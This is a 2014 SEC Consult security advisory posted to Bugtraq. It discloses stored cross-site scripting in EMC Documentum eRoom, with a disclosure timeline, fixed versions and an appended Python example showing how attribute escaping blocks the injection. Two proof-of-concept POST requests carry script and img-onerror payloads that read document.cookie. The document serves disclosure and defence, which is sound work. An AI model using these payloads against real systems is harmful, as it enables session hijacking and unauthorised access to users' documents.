SEC Consult SA-20140701-0 :: Stored cross-site scripting vulnerabilities

Board: Bugtraq, posted 2014/07/02 02:01
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory 20140701-0
=============================================================================
              title: Stored cross-site scripting vulnerabilities
            product: EMC Documentum eRoom
 vulnerable version: 7.4.3, 7.4.4, 7.4.4 SP1
      fixed version: 7.4.3 ESA-2014-060 (hot fix)
                     7.4.4 P19
                     7.4.4 SP1 ESA-2014-060 (hot fix)
                CVE: CVE-2014-2512
             impact: high
           homepage: http://www.emc.com/products/detail/software2/eroom.htm
              found: 2013-11-25
                 by: M. Heinzl
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com/
=============================================================================

Vendor description:
- -------------------
"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline
decision-making."

http://www.emc.com/products/detail/software2/eroom.htm

Vulnerability overview/description:
- -----------------------------------
Documentum eRoom suffers from multiple permanent (stored) cross-site scripting
vulnerabilities, which allow an attacker to steal other users' sessions, to
impersonate other users and to gain unauthorized access to documents hosted in
eRooms. A JavaScript worm could be utilized to crawl an eRoom and gather all
available documents. Many parameters are not properly sanitized before being
written back into pages and are thus vulnerable to XSS.

Proof of concept:
- -----------------
1) When creating a new database, the parameter used for the database fields
("SupportMsg") is not properly validated and is thus prone to permanent
cross-site scripting.

Request:

POST /eRoomASP/eRoomSubmit.asp?FormName=sDlgGeneral&Ctxt=S_1&IsERPage=TRUE&ERClickInMap=FALSE&command=btnOK&SessionKey=ZQCH5DHHZLLV6 HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=ZQCH5DHHZLLV6&ERWindowName=eRw1342094805&EditSiteName=SEC&IEUsersWorkOffline=on&AllowExtAppCommands=on&EnableWebDav=on&UseSecureCookies=on&ExpireSession=60&AlertAdminsObjectCount=on&PercentageObjectLimit=80&MembersChoosePluginOption=on&EnableFileBlocking=on&BlockedFileExtensions=accda%0D%0Aaccdb%0D%0Aaccde%0D%0Aasa%0D%0Aasp%0D%0Aaspx%0D%0Abat%0D%0Achm%0D%0Aclass%0D%0Acmd%0D%0Acom%0D%0Acpl%0D%0Acrt%0D%0Adll%0D%0Aexe%0D%0Ahlp%0D%0Ahta%0D%0Ahtm%0D%0Ahtml%0D%0Ahtw%0D%0Ahtx%0D%0Ains%0D%0Aisp%0D%0Ajs%0D%0Ajse%0D%0Alnk%0D%0Amda%0D%0Amdb%0D%0Amde%0D%0Amdt%0D%0Amdw%0D%0Amdz%0D%0Amht%0D%0Amhtml%0D%0Amsp%0D%0Aocx%0D%0Areg%0D%0Ascr%0D%0Asct%0D%0Ashb%0D%0Ashs%0D%0Aurl%0D%0Avbe%0D%0Avbs%0D%0Awsc%0D%0Awsh&OverrideURL=asd&SupportMsg=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&OtherInfoString=asd&PaginationThreshold=500&LMLThreshold=500&HMLThreshold=5000&RolodexTabs=A%3BB%3BC%3BD%3BE%3BF%3BG%3BH%3BI%3BJ%3BK%3BL%3BM%3BN%3BO%3BP%3BQ%3BR%3BS%3BT%3BU%3BV%3BW%3BX%3BY%3BZ

2) The parameter "FieldName" is not properly validated and is thus prone to
permanent cross-site scripting. A malicious payload will be executed when the
ASP script "ErrLoadingPage.asp" is called.

Request:

POST /eRoomASP/eRoomSubmit.asp?FormName=sDlgCreateDBField&Ctxt=.test.imgsrcxonerroralert33.0_b97&ERClickInMap=FALSE&command=btnNext&SessionKey=N377T7XGBMJOO HTTP/1.1
Host: localhost

IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=N377T7XGBMJOO&ERWindowName=eRw1342086593&FieldName=xxx%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E&FieldType=0

Both payloads close the HTML attribute the stored value is written into with
a double quote (%22) and then inject their own element; the second one uses
an <img> error handler so that it needs no <script> tag at all.

Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been verified to exist in version 7.4.4 P11.

Vendor contact timeline:
- ------------------------
2013-12-10: Contacting vendor through security_alert@emc.com
2013-12-10: Vendor will get back after investigation by December 19th.
2013-12-20: Vendor is still investigating vulnerabilities, will get back in
            January
2014-02-25: Vulnerabilities are confirmed, patch is issued for Q3 2014
2014-03-13: Notify vendor that the advisory will be published in accordance
            with the responsible disclosure policy on 2014-04-20
2014-03-20: Vendor will publish patch end of June 2014
2014-03-31: Agreed to disclose advisory responsibly end of June 2014
2014-06-13: Vendor fixed issues, asking for credit line
2014-06-16: Providing credit line, asking for exact publication date
2014-06-16: Vendor announces patched version for 2014-06-30
2014-07-01: Publication of security advisory

Solution:
- ---------
Upgrade or apply hot fixes:
 * 7.4.3 ESA-2014-060 (hot fix)
 * 7.4.4 P19
 * 7.4.4 SP1 ESA-2014-060 (hot fix)

Patches can be downloaded here:
https://support.emc.com/downloads/5324_Documentum-eRoom

Workaround:
- -----------
None

Advisory URL:
- -------------
https://www.sec-consult.com/en/advisories.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF M. Heinzl / @2014

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAEBAgAGBQJTspMiAAoJECyFJyAEdlkKd14H/1XRfbn4aYlVvMVyCKzg0vqp
JDwu0ZCOZ1gWmCXxJVBB057M2olK9eZL6TM2ONHIwKVSR7bJ3oQOQfz9SUpZCMpQ
V5lZqb4wY6jESj0Vqeq4/QNM1xA+6z83BeokuLg2nZyRJAnT5LLMXtaw5cM4OMcZ
54PO66I5YkuMyyMTQWicscEPwu1bIpW5w2IjtYC9ZCr7c8vFKYPRBfX6ZC/mFKYb
T209peeLrV5dlz7e0q0AH2+llpEeeex06hH53KLG1koNJclDgBbnBA6YWMu74DgT
KRY/n8ZSUs1etiE31jYBrCSpYk0xrfdALufs3pDHFm7m/hOSfvABx+VBRqxEHjw=
=Px4D
-----END PGP SIGNATURE-----
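The following is an added example, not part of the SEC Consult advisory and not eRoom's code. It decodes the two PoC parameters above (SupportMsg and FieldName) the way the server would store them, writes each into a form field both the way a naive page does (straight into the attribute value) and the way a fixed page should (HTML-encoded for attribute context), and uses a small HTML parser to check whether the stored value breaks out of its attribute. The two-template rendering and the `injected_markup` checker are illustrative assumptions; the request bodies are excerpts of the advisory's PoC requests with the unrelated fields dropped.

```python
"""Stored XSS in an HTML attribute: unescaped vs. escaped rendering.

Added example (not SEC Consult's or EMC's code). The templates below are an
assumption about how a form page writes a stored setting back into an
<input>; eRoom's real ASP pages are not reproduced here.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed excerpts of the two PoC request bodies from the advisory:
# only the fields relevant to the finding are kept, values are verbatim.
POC_SUPPORTMSG = (
    "SessionKey=ZQCH5DHHZLLV6&EditSiteName=SEC&OverrideURL=asd"
    "&SupportMsg=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"
    "&OtherInfoString=asd"
)
POC_FIELDNAME = (
    "SessionKey=N377T7XGBMJOO"
    "&FieldName=xxx%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29+%2F%3E"
    "&FieldType=0"
)


def stored_value(body: str, name: str) -> str:
    """What the application stores: the URL-decoded form field value."""
    return parse_qs(body)[name][0]


def render_vulnerable(name: str, value: str) -> str:
    """Naive rendering: the stored value lands verbatim inside value="...".

    A value containing a double quote closes the attribute and everything
    after it is parsed as new markup.
    """
    return f'<input type="text" name="{name}" value="{value}">'


def render_fixed(name: str, value: str) -> str:
    """Fixed rendering: escape for attribute context.

    quote=True encodes '"' (and "'") as well as <, > and &, so the value can
    never terminate the attribute it is written into.
    """
    return f'<input type="text" name="{name}" value="{escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every element and every on* attribute a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        self.tags.append(tag)
        self.handlers += [k for k, _ in attrs if k.lower().startswith("on")]


def injected_markup(html: str) -> list[str]:
    """Elements and event handlers other than the single <input> the template
    intends to emit. An empty list means the value stayed inside the attribute.
    """
    collector = _TagCollector()
    collector.feed(html)
    return [t for t in collector.tags if t != "input"] + collector.handlers


def check(body: str, name: str) -> dict:
    """Render one PoC parameter both ways and report what leaks out."""
    value = stored_value(body, name)
    return {
        "stored": value,
        "vulnerable": injected_markup(render_vulnerable(name, value)),
        "fixed": injected_markup(render_fixed(name, value)),
    }


if __name__ == "__main__":
    for body, name in ((POC_SUPPORTMSG, "SupportMsg"), (POC_FIELDNAME, "FieldName")):
        result = check(body, name)
        print(f"{name}: stored={result['stored']!r}")
        print(f"  naive page injects : {result['vulnerable']}")
        print(f"  escaped page injects: {result['fixed']}")
```

The checker is deliberately context-specific: it only tells you whether a value escapes an HTML attribute. The same stored string written into a JavaScript block or a URL needs a different encoder, which is why "one sanitizer on input" (the approach the advisory says eRoom lacked) is weaker than encoding at each output point.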
Article ID (AID): #1JilTVDQ (Bugtraq)